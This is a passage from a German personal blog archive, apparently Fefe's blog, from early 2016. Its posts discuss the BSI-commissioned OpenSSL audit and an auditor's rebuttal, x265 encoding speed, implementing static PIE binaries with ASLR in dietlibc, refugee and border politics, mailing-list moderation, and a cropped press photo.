- Invalid Curve Angriffe: vorherige Papers untersuchen andere Art dieser Angriffe, daher finde ich eine Überprüfung legitim. Bei den letzten zwei Punkten wurde es festgestellt, dass SSL_OP_SINGLE_DH_USE und SSL_OP_SINGLE_ECDH_USE nicht default sind, was im Report steht…
Ein falscher Eindruck hätte auch dadurch entstehen können, dass die Ergebnisse erst jetzt publiziert wurden. Die Studie wurde im Zeitraum cca. 6-2014/3-2015 durchgeführt.
Generell finde ich es extrem schwer in einer Bibliothek bugs zu finden, die täglich von hunderten Forschern auch untersucht wird. Da wir keine super gefährliche bugs gefunden haben, bedeutet es nicht, dass unsere Analyse schlecht war. Ein Beweis dafür liefern auch die letzten CVEs: es ist mir nicht bekannt, dass in den letzten zwei Jahren bugs gemeldet wurden, die in unserem Scope gewesen wären und die wir übersehen hätten (oder?).
Ich habe inzwischen auch mal ein bisschen in den PDFs geblättert und muss meine Meinung zu dem Audit revidieren. Schon das Inhaltsverzeichnis macht klar, dass hier methodisch und systematisch vorgegangen wurde, und nicht nur ein bisschen Cherry-Picking stattgefunden hat.
Besonders die erwähnten Krypto-Dinge gefallen mir gut, denn das sind die Sachen, bei denen ich mir nicht sicher bin, dass ich das ordentlich getestet gekriegt hätte.
Für die Zukunft fände ich es gut, wenn wir vom Reaktiven zum Aktiven übergehen könnten. OpenSSL braucht mehr als einen Audit. OpenSSL braucht zum Beispiel eine Infrastruktur, um den Krypto-Kram optional in einen eigenen Prozess auszulagern, damit bei einem Bug in Apache nicht auch die privaten TLS-Schlüssel lecken können. Und was mich bei OpenSSL neben der furchtbaren Codestruktur und den ganzen bizarren Abstraktionen und Indirektionen am meisten stört, ist dass die Defaults in so vielen Fällen Scheiße sind. Erstens braucht man eine metrische Tonne Cargo Cult-Code, um überhaupt den ganzen nötigen Buchhaltungsscheiß zu erledigen, und dann braucht man nochmal zwei metrische Tonnen Code, um die ganzen schlechten Defaults zu korrigieren. Das geht so nicht.
Ich weiß nicht, ob das BSI dabei helfen kann. OpenBSD hat ja mal angefangen, einfach ein anderes API anzubieten, das weniger schlimm zu benutzen ist. Ich denke, da müssen wir hin.
[l] Der Deal, den Tesla mit Nevada gemacht hat, um dort ihre Batteriefabrik zu bauen, ist beeindruckend. Man sieht deutlich, wie viel Macht große Firmen inzwischen haben, wenn sie mit Arbeitsplätzen wedeln. Und alles nur, weil wir mehr Menschen als ausreichend bezahlte Arbeitsplätze haben.
In diesem Deal hat Tesla jetzt 1,3 Milliarden Dollar an Steuernachlässen gekriegt. Gut, über 20 Jahre, aber trotzdem. 1,3 Milliarden!? Wow.
[l] Große Hoffnungen verbanden viele Security-Fachleute mit der Ansage des BSI, dass sie mal einen ordentlichen OpenSSL-Audit durchführen lassen wollen.
Ich hätte mich da auch bewerben können, aber habe es nicht getan, weil ich lieber wollte, dass das jemand macht, der die ganzen Crypto-Details so gut versteht, wie ich typische C-Programmierfehler verstehe. Kurz: Ich habe mir Sorgen gemacht, dass wenn ich das mache, dass ich das dann nicht richtig abdecke. Sondern halt nur den Teil wirklich angucke, den ich halt besonders gut kann, und über den Rest im schlechtesten Fall gar nichts sagen kann oder im besten Fall zwar geguckt habe, aber möglicherweise nicht genug Hintergrundwissen oder Durchdringung der Materie mitbringe, so dass meine Aussage kein großes Gewicht hat am Ende.
Nun, der Audit hat stattgefunden.
Zu meiner großen Enttäuschung muss ich jetzt konstatieren, dass das dann halt andere Leute genau so gemacht zu haben scheinen, wie ich es bei mir vermeiden wollte. Die haben halt da geguckt, wo schon Lücken bekannt waren, und haben dann diese Lücken nicht mehr gefunden. Diesen Audit hätte man sich auch sparen können. Einen Black-Box-Audit auf den Zufallszahlengenerator? Soll das ein Scherz sein!? Und dann gnädigerweise auch mal kurz ein paar Zeilen Quellcode angeguckt?!?
Das war ein Reinfall. Das wäre ja sogar besser geworden, wenn ich mich beworben hätte. Und das ist keine starke Aussage, siehe oben.
Sehr schade. Eine vertane Chance.
Wobei ich meine Einschätzung jetzt natürlich auf diese Meldung bei Heise stütze. Vielleicht ist die ja falsch und es war besser als es sich da jetzt anhört.
Update: Einer der Auditoren hat mir eine Mail geschrieben:
Die Darstellung in deinem Blogeintrag bzw. Heise ist nicht korrekt (http://blog.fefe.de/?ts=a842a5a6).
Die Analyse des RNG war nur im ersten Schritt Black-Box (wodurch Schwächen gefunden wurden). Im zweiten, selbstverständlich aufwändigeren Teil haben wir uns den Source Code angeschaut, ein Modell des RNG-Algorithmus aufgebaut, den Lebenszyklus des RNGs und dessen Zustand angeschau, etc. Die Methodik ist im Bericht dokumentiert, ein Blick in das Inhaltsverzeichnis liefert schon Informationen dazu.
Bei der Schwachstellenanalyse wurde ähnlich vorgegangen. Es wurden Blackbox-Tests durchgeführt (durch die Schwächen gefunden werden konnten), sowie eine Code Review verschiedener wichtiger Komponenten durchgeführt. Wir mussten selbstverständlich den Scope einschränken (wen interessiert schon die GOST und SSL3.0-Implementierung?), aber denken, dass die wichtigen Komponenten in einem angemessenen Rahmen betrachtet wurden.
Nach meiner Einschätzung würde sich das BSI mit einer oberflächlichen Analyse nicht zufrieden geben. Da sitzen Leute, die sich mit der Thematik sehr gut auskennen.
Update: Hier ist das PDF des Berichtes.
Update: Oh, es gibt nicht nur ein PDF, sondern drei.

Tue Feb 9 2016

[l] Webseiten-Tipp: Practical Typography. Ich fand Typographie schon immer interessant, aber diese Webseite vereint neben ihrer inhaltlichen Stärken auch noch mehrere andere Qualitäten, die ich sehr attraktiv finde. Ich habe bei jedem Satz dort das Gefühl, dass der Autor sich Gedanken gemacht hat, ob der Satz wirklich da sein muss. Der hat auch Clickbaiting nicht nötig, hat seine Schriftarten selber designed, und zeigt als gutes Vorbild, wie schöne Webseiten aussehen sollten. Eine der Webseiten, zu der ich immer mal wieder gerne hingehe und nochmal durchklicke. Und wo ich bislang nichts gefunden haben, über das ich mich hätte ärgern können :-) Kein Javascript oder externe Resourcen, die man erst freischalten muss. Kaum nerviges Tracking-Zeug. Keine nervigen Affiliate-Links.
Update: Ist down. Verteilt euch mal bitte ein bisschen über die Woche :-) Lohnt sich auf jeden Fall.
Update: Ich hab da ein paar Fonts gekauft. Sogar die Bestellseite ist typographisch vorbildlich.

Fri Feb 5 2016

[l] Bei der Iowa-Vorwahl neulich war nicht nur überraschend, dass Trump nicht gewonnen hat, und dass ausgerechnet Cruz ihn geschlagen hat, sondern auch dass Marco Rubio nur knapp hinter ihnen auf den 3. Platz kam.
Da sprießen jetzt tollen Verschwörungstheorien aus dem Boden, unter anderem dass Microsoft (einer der Hauptsponsoren von Rubio), die auch die Auszählung gemacht haben, da Trump-Stimmen zu Rubio rübergeschoben haben, damit es nicht Trump wird. Microsoft dementiert das natürlich, und ich halte das auch nicht für sonderlich glaubwürdig, denn Microsoft ist so groß, dass die wahrscheinlich allen Kandidaten Spenden zuschieben, damit der nächste Präsident nicht jemand ist, der schlecht auf sie zu sprechen ist, weil er als einziger keine Wahlkampfspenden gekriegt hat. Rubio ist halt eigentlich ein krasser Aussenseiter, insofern machen die 33000 Dollar, die Microsoft da gespendet haben soll, bei dem plötzlich genug aus, um MS auf den 2. Platz unter den Spendern zu hieven. Hillary hätte für den Betrag nicht mal eine Dankesmail geschrieben :)
Breitbart waren wohl die ersten, die das verbreitet haben. Und die verbreiten häufiger so krude Verschwörungsgeschichten und unterstützten so Teaparty-Außenseiterkandidaten.

Sun Jan 31 2016

[l] Habt ihr schon mal von "pinkwashing" gehört? Das ist ein Kampfbegriff für die Unterstellung, Israels schwulenfreundliche Politik sei bloß ein Ablenkungsmanöver, um von der Palästina-Situation abzulenken. WTF?
Es gab den Begriff schonmal für Firmen, die aus Imagegründen so tun, als würden sie gegen Brustkrebs kämpfen.
Ich höre den Begriff heute zum ersten Mal und finde besonders diesen Teil hier bemerkenswert:
ht wenige gehen sogar so weit, den Einsatz für LGBTQ in Israel als Form des »Homonationalismus« und der »Islamophobie« anzusehen. Sie behaupten, die Kritik an der Homophobie in islamischen Ländern habe kulturalistische, ja, koloniale Züge und gehe mit einer Abwertung islamischer Gesellschaften einher.
Und so gibt es hier einen Grabenkrieg zwischen Pro-LGBT-Gruppen, die sich gegenseitig vorwerfen, nicht die reine Lehre zu vertreten. Kommt das noch jemandem bekannt vor?
Hey, und wenn man sich schon mal auf so eine Theorie versteift hat, dann geht man das Gleis natürlich weiter:
Konsequenterweise wird Israel nicht nur des »Pinkwashings« bezichtigt, sondern auch für die homophoben Zustände in den palästinensischen Gebieten verantwortlich gemacht.
Wait, what?! (Danke, Hilko)

Sat Jan 30 2016

[l] Bei Meldungen wie diesem Nazimob in Stockholm und Handgranaten auf Flüchtlingsheime macht mich ja immer diese Diskrepanz zwischen der Realität da draußen und der gepolsterten Gummizelle der "Mikroaggressionen"-Leute ganz fertig. Die Nazis bringen Menschen um, und alle, die sie hätten stoppen können, kritisieren sich lieber gegenseitig an Unis darüber, wer jetzt wen mit welcher Mikroaggression getriggert hat.
Was für eine Zukunft soll das eigentlich werden, die wir da hinterlassen? Wenn uns in 30 Jahren jemand fragt, wieso wir damals eigentlich nichts gemacht haben … was sagen wir dann?
Ich hätte ja was getan, aber als ich die Tür aufmachen wollte, wurde ich getriggert!
Der Cicero macht sich auch Sorgen.
Gibt es eigentlich jemanden, der Political Correctness (also die Ur-Form von vor 30 Jahren) für erfolgreich hält? Hat die die Gleichstellung der Frau und den Respekt vor anders aussehenden befördert? Findet das jemand? Oder hat die nur dafür gesorgt, dass diese Ängste kein Ventil mehr haben und unterdrückt werden, bis es zu einem Amoklauf oder anderweitigen Gewaltausbruch kommt. Sind die Zahlen an sexuellen Übergriffen rückläufig? So fühlt sich das jedenfalls für mich nicht an.

Thu Jan 28 2016

[l] Das Safe Harbor-Moratorium läuft nächste Woche aus. Und ein neues Abkommen ist nicht in Sicht.
Die Amerikaner denken sich hier offenbar, sie könnten die Europäer einfach am langen Arm verhungern lassen. Vielleicht ist das ja mal ein Weckruf, dass wir viel zu viel Internet-Einfluss anderen Ländern überlassen haben. Ich persönlich würde es begrüßen, wenn jetzt einfach diverse Firmen ihren Internet-Auftritt herunterfahren müssten, weil die Politik kein Abkommen mit den USA hingekriegt hat. Einfach damit man mal sehen kann, welche Firmen sich und unsere Daten da von den USA abhängig gemacht haben und welche nicht.

Wed Jan 27 2016

[l] Grenzendomino: Mazedonien schließt die Grenze zu Griechenland. Die EU lässt jetzt echt Griechenland auf dem Flüchtlingsproblem sitzen. Als ob wir denen noch nicht genug angetan hätten!
Schon vorher hatte Serbien die Grenze nach Mazedonien zugemacht.
[l] Kennt ihr den alten Handwerker-Spruch "Was nicht passt wird passend gemacht"? Wie sich rausstellt gilt das auch für die Pässe von Flüchtlingen. Wenn Deutschland die nicht abgeschoben kriegt, dann gibt es einen Deal mit afrikatnischen Botschaften, und die stellen dann falsche Pässe unter abschiebfähigen Nationalitäten aus, damit wir die Flüchtlinge doch loswerden.
Update: Highlight aus dem Artikel:
Das Lüneburger Gericht kritisierte, dass eine Delegation die Kopfform von Flüchtlingen inspiziert hatte, um ihre Herkunft zu ermitteln. Das geschah auch Koroma, dem der Delegationsleiter bei der ersten Anhörung bescheinigte, er sehe aus wie jemand aus dem nigerianischen Bundesstaat Ogun, woraufhin er seinen Geburtsort änderte. Bundespolizisten saßen daneben und schwiegen.
Hey, wisst ihr, wer noch versucht hat, in Abschiebungs- und Verfolgungsfragen die Zugehörigkeit zu ethnischen Gruppen anhand der Schädelform zu erkennen?

Tue Jan 26 2016

[l] Ich habe gerade mal ein bisschen mit x265 herumgespielt, und wow haben die Fortschritte gemacht! Die Encoding-Performance war immer massiv unakzeptabel, aber ich kann hier gerade Full-HD-Material mit 18 fps encoden. Das ist die Schranke, bei der für mich x264 akzeptabel wurde. Bisher war das in meinen Versuchen eher so 3 fps. vp9 ist immer noch in solchen Regionen.
Das ist ein echter Durchbruch. Ich bin echt beeindruckt, dass die das hingekriegt haben. Man darf gespannt sein, was da in Zukunft noch so gehen wird.
HEVC ist ja auch vom Codec-Support her praktisch einsatzfähig. Aktuelle Grafikkarten unterstützen Echtzeit-Decoding davon, teilweise sogar -Encoding (aber da kann die Qualität pro Bandbreite meiner Erfahrung nach nicht mithalten).
Mein Test läuft hier gerade mit CRF 28, und da kommt bei dem Testmaterial unter 1000 kbit/sec raus.
1000 kbit/sec ist die Schallmauer, bei der damals 640x360 als dvdrip mit den ersten xvid-Versionen gerade noch gut ging. Mit der Bandbreite macht x265 jetzt Full HD. Und das ist auf Hardware von heute so schnell wie das damals auf Hardware von damals war :-)

Sun Jan 24 2016

[l] Ich habe hier gerade ein faszinierendes Bitfrickel-Problem. Seit einer Weile versuche ich, in dietlibc PIE-Binaries zu unterstützen. PIE ist Position Independent Executable. Normale Binaries unter Linux sind dynamisch gelinkt, d.h. das Binary lädt noch libc.so.6 und so weiter rein, und der Glue-Kram wird von ld.so oder ld-linux-x86-64.so.2 oder je nach Plattform halt gemacht. ld.so ist ein ganz normales Executable, das lädt dann eben die Shared Libraries per mmap rein und bastelt ein paar Datenstrukturen zurecht, damit die Sprünge und Variablenreferenzen zwischen den Komponenten funktionieren.
Eine wichtige Sicherheitstechnologie ist, dass man dafür sorgt, dass die Shared Libraries nicht immer alle an der selben Adresse geladen werden. Es geht darum, Angreifern das Ausnutzen von Sicherheitslücken zu erschweren. Dieses Verfahren heißt ASLR.
Unter Linux ist das umgesetzt, indem mmap die Speicherbereiche randomisiert, d.h. ld.so muss gar nicht viel dafür machen. Jetzt gibt es zwei Probleme. Erstens ist ld.so ein Executable, keine Shared Library, d.h. es wird nicht an eine zufällige Adresse geladen, sondern an eine statische. Zweitens ist das Hauptprogramm ein Executable, keine Shared Library. Der ld.so von glibc ist deshalb jetzt doch eine Shared Library, um dieses Einfallstor zu schließen. Aber das Hauptprogramm landet doch immer noch immer an der selben Adresse, außer — ja außer, man kompiliert es mit -pie. Im Grunde gibt es gar keinen echten Unterschied zwischen Hauptprogramm und Shared Library in ELF, außer dass das Hauptprogramm im Header eine Adresse stehen hat, an die es geladen werden will, und die Shared Library kann irgendwohin geladen werden. Wenn man also ASLR in allen Komponenten haben will, dann müssen alle Komponenten ELF-technisch Shared Libraries werden.
So, was ist jetzt mit dietlibc. dietlibc erzeugt statische Binaries, d.h. ohne ld.so und ohne libc.so. Das ist ja gerade die Idee bei der dietlibc. Ich fragte mich jetzt, ob ich es nicht hinkriegen kann, ein statisches Binary zu erzeugen, dass der Kernel hinladen kann, wo er will. Erstmal geht es mir nur um meine Entwicklungsplattform, AMD64. Dort und bei x86 insgesamt ist es so, dass ein Funktionsaufruf zu "call 1234" wird, aber 1234 ist nicht die absolute Adresse, an die man hinspringen will, sondern relativ zur aktuellen Position des Instruction Pointer. Wenn die Calls alle relativ innerhalb des Code-Moduls sind, dann ist es auch egal, an welcher Stelle im Speicher das liegt.
Speicherzugriffe auf Variablen laufen bei x86 aber über absolute Adressen. Auf dem 32-bit x86 hat man dann ein Problem, denn man kann keine Adressen in Relation zum aktuellen Instruction Pointer konstruieren. Bei AMD64 ist das anders, daher dachte ich, wenn ich mich erstmal darauf konzentrieren, dann ist das ein Selbstläufer. Ist es leider nicht.
Das Problem ist, dass ich anscheinend der erste bin, der das machen will. Alle anderen wollen normale dynamische Binaries erzeugen, und da laufen alle Zugriffe über die Glue-Datenstrukturen. Mein erstes Problem ist, gcc zu sagen, dass er diese Datenstrukturen bitte nicht benutzen soll. Mein aktueller Ansatz dafür ist -fvisibility=hidden, aber das hilft leider nur ein bisschen. Für in Headern als "extern" deklarierte Symbole hilft es nicht.
Gut, dachte ich mir laut seufzend. Dann muss mein Startup-Code halt ran. Ich kompiliere also meinen Code mit -fpic -fvisibility=hidden und linke daraus erfolgreich eine Shared Library. Wenn ich die aufrufe, wird mein Startup-Code ausgeführt. GOT und PLT sind eh schon in den Speicher gemappt (das sind diese Glue-Datenstrukturen). Da stehen nur noch falsche Dinge drin. So schwer kann das ja wohl nicht sein. Ich fange also an, da ein bisschen Code zu schreiben, und scheitere gerade an trivial anmutenden Details.
Und zwar habe ich in meiner "shared library" ja keinen ELF Interpreter ("ld.so") drin. Woher weiß denn mein Code, wo die GOT ist? Das steht in ELF-Datenstrukturen, die Teil der Shared Library sind. Die mappt der Kernel in den Speicher. Ich weiß nur nicht, wo die genau sind. Der Mechanismus dafür heißt AUXVEC. In C ist das Hauptprogramm ja die Funktion main(), und die kriegt die Kommandozeilenargument und das Environment übergeben. Das Environment ist ein Array von char*, und NULL markiert das Ende der Liste. AUXVEC ist einfach dahinter im Speicher. Wer das mal sehen will:
```
% LD_SHOW_AUXV=1 /usr/bin/true
```
Da steht bei mir sowas hier:
```
AT_SYSINFO_EHDR: 0x7ffc0ab78000
AT_HWCAP:        bfebfbff
AT_PAGESZ:       4096
AT_CLKTCK:       100
AT_PHDR:         0x400040
AT_PHENT:        56
AT_PHNUM:        8
AT_BASE:         0x7fa6e6d65000
AT_FLAGS:        0x0
AT_ENTRY:        0x401460
AT_UID:          1000
AT_EUID:         1000
AT_GID:          100
AT_EGID:         100
AT_SECURE:       0
AT_RANDOM:       0x7ffc0aadb909
AT_EXECFN:       /usr/bin/true
AT_PLATFORM:     x86_64
```
Hier kann man ganz schön sehen, dass AT_PHDR (ein Zeiger auf den ELF Program Header) nicht an ASLR teilgenommen hat, während AT_BASE (die Basisadresse von ld.so) randomisiert wurde. AT_ENTRY ist die Adresse im Speicher, bei dem die Ausführung beginnt. Das ist nicht main() sondern ein Symbol namens "_start", in dem die libc ihren Kram macht und dann main() aufruft.
Gut, dachte ich mir, das ist ja weitgehend was ich haben will. Alles super. Von AT_BASE aus kann ich mich durch die ELF-Strukturen hangeln (und die Werte darin sind alle relativ zur Ladeadresse des Binaries). Da finde ich die GOT und kann mal schauen, was da so drin steht, und was ich relozieren muss. Viel mehr als AT_BASE draufaddieren wird das nicht sein, wenn ich Glück habe.
Und was stelle ich jetzt fest? AT_BASE wird nicht übergeben. AT_BASE ist nämlich die Ladeadresse des ELF Interpreters, also ld.so, und den habe ich ja nicht. Meine eigene Base-Adresse sagt mir der Kernel nicht. Immerhin sagt mir der Kernel immer noch AT_PHDR, und das ist auch schon mal was, aber von da aus finde ich die Basis-Adresse nicht, zu der mein Binary geladen wurde. Also jedenfalls nicht offiziell. In der Praxis runde ich von da auf den Page-Anfang ab und hab es, aber das ist ja iih-bäh. Ich fürchte, ich bin schlicht der Erste, der gerne statische PIE-Binaries haben will.
Seufz.
In den gemappten Datenstrukturen stehen leider überall nur Angaben relativ zum Beginn der Datei drin. Und wo das Mapping losgeht, sagt mir der Kernel nicht.
Sachdienliche Hinweise werden dankend entgegen genommen!

Fri Jan 22 2016

[l] Zu der H&K-Gewehre-im-Irak-Nummer kommt hier noch ein Kommentar rein:
Ich habe in über 30 Jahren Firmenzugehörigkeit noch niemals gesehen, dass eine Waffe aus Bundeswehrbeständen durch „BW“ kenntlich gemacht worden wäre! Es war nur eine Zuordnung des Herstellerlandes über die 5te und 6te Stelle der 12stelligen NATO-Versorgungsnummer möglich. USA bezeichnenderweise mit „00“ oder „01“, BRD durch „12“.
Ferner ist das G3 von H&K, nach der Kalaschnikov und dem M16(AR15) der Amis, das weltweit verbreitetste Sturmgewehr!
Außerdem: die BW wurde seinerzeit mit einem neuen Sturmgewehr (G36!!) beglückt, weil das alte G3 überhaupt nichts mehr taugen würde. Die großen Bestände an G3 gingen an die Türken(!), zusammen mit unseren AK47 und AK/74-Beständen der NVA.
Update: Dieser Kommentar kam anscheinend aus H&K-Nähe. Mehrere Kommentare aus Bundeswehr-Nähe sagen jetzt, dass die Waffen dort alle so aussehen, mit BW-Logo. Die Vermutung ist, dass das halt nach Übernahme von H&K angebracht wird, vielleicht vom wehrtechnischen Dienst oder so.

Wed Jan 20 2016

[l] Old and busted: Hund entlaufen.
New hotness: Drohne entflogen.
Das Bild kam zwar höherauflösender aber unscharf rein, also habe ich es kleiner gemacht. (Danke, Lars)
[l] Weil jetzt einige Leute nachfragen:
Wenn du deine einkommenden Mails filterst, ist das OK. Das ist dein Recht. Das ist keine Zensur. Du darfst dir ja auch aussuchen, wohin du deine Augen richtest.
Wenn du die einkommenden Mails Anderer filterst, dann ist das eine Netzsperre und ich kann nicht Mitglied deines Vereines sein. Niemand sollte sich anmaßen, für andere zu entscheiden, was die sehen können und was nicht.
Da kann man möglicherweise noch Ausflüchte, Abstufungen und Entschuldigungen finden. Zum Beispiel wenn ich einen Spambekämpfungs-Dienstleiter beauftrage, dann darf der das natürlich.
Von mir aus kann man auch darüber reden, Moderation von inhaltlichen Mailinglisten zu machen, damit Spam und off-topic-Sachen rausfliegen. Das muss dann allerdings mit Einverständnis aller Subscriber stattfinden und willkürfrei entschieden werden können. Kochrezepte sind auf einer Mailingliste über Ornithologie klar off-topic.
In diesem Fall ging es aber darum, Mails wegen des aktuellen Gefühlszustands eines Moderators zu filtern. Wenn der Moderator findet, diese Mail könnte jemanden erzürnen, dann kommt die nicht durch.
In meinem Wertesystem ist das so weit jenseits aller vertretbaren Szenarien, dass ich mit einem Austritt reagiert habe. Sachen wegfiltern, weil sie die Partei erzürnen könnten, das ist etwas, was die DDR gemacht hat, oder China. Saudi Arabien. Aber ganz sicher keine Organisation, bei der ich Mitglied bin.
Beachtet bitte auch, dass ich niemandem Zensur vorgeworfen habe. Das Wort wird viel zu inflationär angewendet.
Update: Einen noch. Es gibt einen Unterschied zwischen öffentlichen Mailinglisten und internen Mailinglisten für Mitglieder. Gegenüber Externen kann der Betreiber von Mailinglisten das Hausrecht geltend machen. Wer sich daneben benimmt, fliegt. Meine Mailingliste, mein Hausrecht. Bei internen Mailinglisten kann man das Hausrecht nicht anwenden, denn den Mitgliedern gehört das Haus. Auch denen, die sich daneben benehmen. Daher bleibt hier meiner Ansicht nach nur der Rausschmiss. Dann aber nicht nur von der Mailingliste, sondern aus dem ganzen Verein. Und dann kann man auch das Hausrecht anwenden bezüglich der Mailingliste. Die ganze Thematik ist sehr vertrackt, und was man unbedingt vermeiden muss ist Willkür. Man muss klare Regeln definieren, die müssen völlig klar willkürfrei anwendbar sein. Wenn nicht völlig klar ist, ob eine Regel greift, dann greift sie nicht. Wer im Krisenfall keine Regeln angesagt hat, hat in meinem Wertesystem auch nur Handhabe für zukünftige Fälle und kann nicht rückwirkend sanktionieren (außer es handelt sich um klare Rechtsbrüche und ist ein Fall für die Staatsanwaltschaft).

Wed Jan 13 2016

[l] Die Yes Men haben eine tolle Pressekonferenz im EU-Parlament gemacht. Dort haben sie einen "Antiterrorschutzanzug" vorgestellt. Kürzer geschnittene Version. Martin Sonneborn sitzt im Publikum und hilft sofort mit :-) (Danke, Sam)
[l] Ich überlege gerade, was mich eigentlich an Online-Unterschriftenlisten so nervt.
Es ist glaube ich das selbe, was mich auch an Brustkrebs-Märschen und der Ice Bucket Challenge genervt hat.
Der Eindruck, dass es den Teilnehmern nicht um Brustkrebs oder ALS ging, sondern darum, sich selbst besser zu fühlen. Ohne dafür irgendwas tun zu müssen, am besten.
Naja, wen interessiert denn, dass das aus egostischen Motiven heraus gemacht wird? Ist doch für die gute Sache?
Und genau das glaube ich halt schlicht nicht. Dass das für die gute Sache ist. "Awareness schaffen" halte ich für Bullshit. Kein Mensch hat weniger Krebs, weil letztes Jahr ein Awaressness-Event durchgeführt wurde. ALS ist nicht plötzlich besser behandelbar, weil Leute sich Eis über den Kopf geschüttet haben. Hier werden Krankheiten instrumentalisiert, um den Teilnehmern von so einem Event einen egoistischen Trieb zu befriedigen. Den Trieb, sich besser zu fühlen.
Das kann man natürlich über alle Demonstrationen so sagen. Und damit hadere ich auch. Ich vermute da einen Bug in der Herleitung meiner Argumentation, habe ihn aber noch nicht gefunden.
Oder vielleicht ist es bei Demonstrationen anders, weil die ja doch gelegentlich etwas bewirken können. Sehr selten, aber nicht ausgeschlossen.
Aber das kann man auch über Awareness-Events vermuten. Dass jemand Krebsdoktor wird, weil er so einen Awarenessmarsch gesehen hat, und der findet dann eine Heilmethode. Die Hoffnung stirbt ja immer zuletzt. Besonders überzeugend finde ich das nicht. Vielleicht mache ich deshalb so selten bei Demonstrationen mit.
Naja. Verzeiht mir die schlechte Laune, die ich hier verbreite. Das Jahr hätte echt deutlich besser anfangen können. Muss auch mal sein.
Vielleicht kommen ja bei solchen Events nennenswert Spenden für die Forschung zusammen. Weiß das jemand? Das wäre ein Argument, das ich gelten lassen könnte. Aber ich würde immer noch vermuten, dass die Ökonomie der Pharmafirmen dafür sorgt, dass die Milliarden lieber zu Haarwuchsmitteln und Potenzpillen gehen als zu einer neuen ALS-Behandlung. Der Markt ist einfach viel größer.

Mon Jan 11 2016

[l] Wenn ihr das Video von dem Interview gesehen habt, das Tilo Jung auf dem 32c3 mit mir gemacht hat: Der gibt mir am Anfang etwas und fragt, ob ich nicht Anti-Terror-Kämpfer werden will.
Es handelte sich um die "JOBWOCHE", laut Selbstdarstellung "Die große Karriere-Zeitung für Norddeutschland". Die liegt gratis zum Mitnehmen beim Arbeitsamt aus.
Hier ist ein Foto des Covers, das er mir damals zeigte.
Den Artikel dazu aus dem Inneren hat mir jetzt jemand als Foto per Mail geschickt: Da kann man Verwaltungswirt beim Verfassungsschutz werden!
Update: Hier noch ein anderes Cover der JOBWOCHE. Weia. (Danke, Ben)
[l] Habt ihr den Kommentar gestern noch auf dem Radar? Das Bild, das ich da verlinkt hatte?
Nun, das hat ein Leser hier wiedererkannt.
So und jetzt vergleicht mal. Mein Einsender schrieb, hier wurde wahllos Pfefferspray gegen Demonstranten eingesetzt. Beim Schwäbischen Tagblatt fehlt dann am rechten Rand der Pfefferspray-Kanister und die Bildunterschrift macht aus dem Pfefferspray einen Wasserwerfer und deklariert die getroffenen Demonstranten pauschal als gewalttätig.
Das ist ja wie in Afghanistan! Da waren auch rückblickend alle Drohnenopfer immer Terroristen.
Ich finde das ja erstaunlich, wie die Presse sich dann noch über das "Lügenpresse"-Label wundern kann.
Update: Einer meiner Leser sagt, er habe das Schwäbische Tagblatt auf Facebook im Chat darauf angesprochen, und diese Antwort gekriegt:
Erstens funktioniert der Link zu dem von Ihnenerwähnten Bild nicht.
Ja, äh, sorry, das passiert leider gelegentlich, wenn ich auf eine Webseite linke, bei der in den URLs ".php" vorkommt. Erholt sich bestimmt bald!
Zweitens wurde uns der erwähnte Artikel von unserem Mantelpartner, der Südwest Presse in Ulm, zugeliefert, die den Text von der Deutschen Presse Agentur (dpa) und das Bild von der Agentur Imago bezogen hat. Sollte da tatsächlich aussageverändernd beschnitten worden sein, würden wir das keinesfalls gutheißen.
Update: Das ist dann hier wohl der erwähnte Mantelpartner
Update: Nachdem ein anderer Leser die SWP auf das Problem aufmerksam gemacht hatte, haben die jetzt die Bildunterschrift geändert.
Update: Das Schwäbische Tagblatt hat das Foto und die Bildunterschrift korrigiert.

Sun Jan 10 2016

[l] Zu dem "Skinhead"-Ding kam dieser weiterhelfende Mailkommentar rein:
du hast grad ein Video verlinkt, bei dem ich ca. 1 Meter hinter der Kamera stand für Fotos. Zu der Pegida Demo in Köln muss man wissen, dass Köln seit je her sich selbst als besonders "tolerant" hinstellt und KoelnTourismus der Arsch auf Grundeis geht derzeit, dass dieses Image Kratzer bekommen könnte. Es war daher aus meiner Sicht von den Pegida-Leuten ein Riesenfehler, die Demo unter anderem mit Hogesa und NPDlern zu machen. Ich war für Fotos vor Ort und kann folgendes Berichten:
- Hools, Krawallos und klassische Neonazis machten ca. 30 Prozent der gesamten Demo aus. Der Rest waren stinknormale Leute, Rollstuhlfahrer, Herrschaften mit Hund und Kindern.
- Ich hab auch beiden Demos Fotos gemacht, wurde aufgrund meiner kurzen Haare aber nach 2 Minuten auf der "Anti Rassismus Demo" von einem Antifa-Mädchen als "Nazi-Fotograf" betitelt, und man hetzte mir die Polizei auf den Hals, weil ich "Frauen fotografiert" hätte… (mein Job… aber ok…)
- bei dem "Pegida-Marsch" setzte sich die Hogesa-Klientel angeführt von Herrn Roeseler an die Spitze. Dort waren ca. 150 gewaltbereite Hools. Flaschenwürfe und Böller stimmt alles. Allerdings war in einem Fall der Werfer des Böllers ermittelt und verschwand innerhalb kurzer Zeit durch die Polizeiabsperrung, dort hieß es dann, er habe einen "Presseausweis" gezeigt (Verfassungsschutz?). Es kursiert inzwischen ein Video, dass das debunken soll, allerdings zeigt dieses nur jemanden, der von einem Böller ausweicht, nicht den Werfer, der nach Zeugen im Pulk stand.
- nach dem Böllerwurf war die Polizei der Meinung, die Runde dürfe nicht fortgesetzt werden und besprühte die forderen Reihen mit Pfefferspray. von der Antifa war weit und breit keine Spur, es schien eher, als sei es politisch nicht erwünscht, dass es einen gelungenen Spatziergang durch Köln gibt. Es sollte eskalieren. Und es wurde nachgeholfen, indem z.B. der Wasserwerfer demonstrativ herangefahren wurde anstatt einfach weiterzugehen.
- anschließend mussten sich die 3000 Leute in Gegenrichtung zum Startpunkt zurückbewegen. Dabei wurde ohne Rücksicht auf Presse Pfefferspray eingesetzt, z.B. (Bilder 647156 bis 647159)
Da man in umgekehrter Richtung zum HBF zurückkam, gingen die Hools von der Spitze auch als letztes dann in den HBF. In diesem Moment enstand das Video, das BILD.de zeigt. Es zeigt also wahrheitsgemäß Teilnehmer der PEGIDA Demo, stellt aber eine völlig verzerrende Stichprobe dar. Antifa vs. Pegida - I have no dog in this fight. Allerdings tun mir die Personen auf dem Bild speziell leid: http://www.future-image.de/details.php?gid=40&pid=647156
ich stand 5 Meter daneben und konnte danach erstmal nicht mehr atmen. Das war völlig unnötig und ging noch weiter, auch als die sich weggedreht haben.
Update: Das kursierende Video ist wohl das hier? (Danke, Christoph)

Thu Dec 31 2015

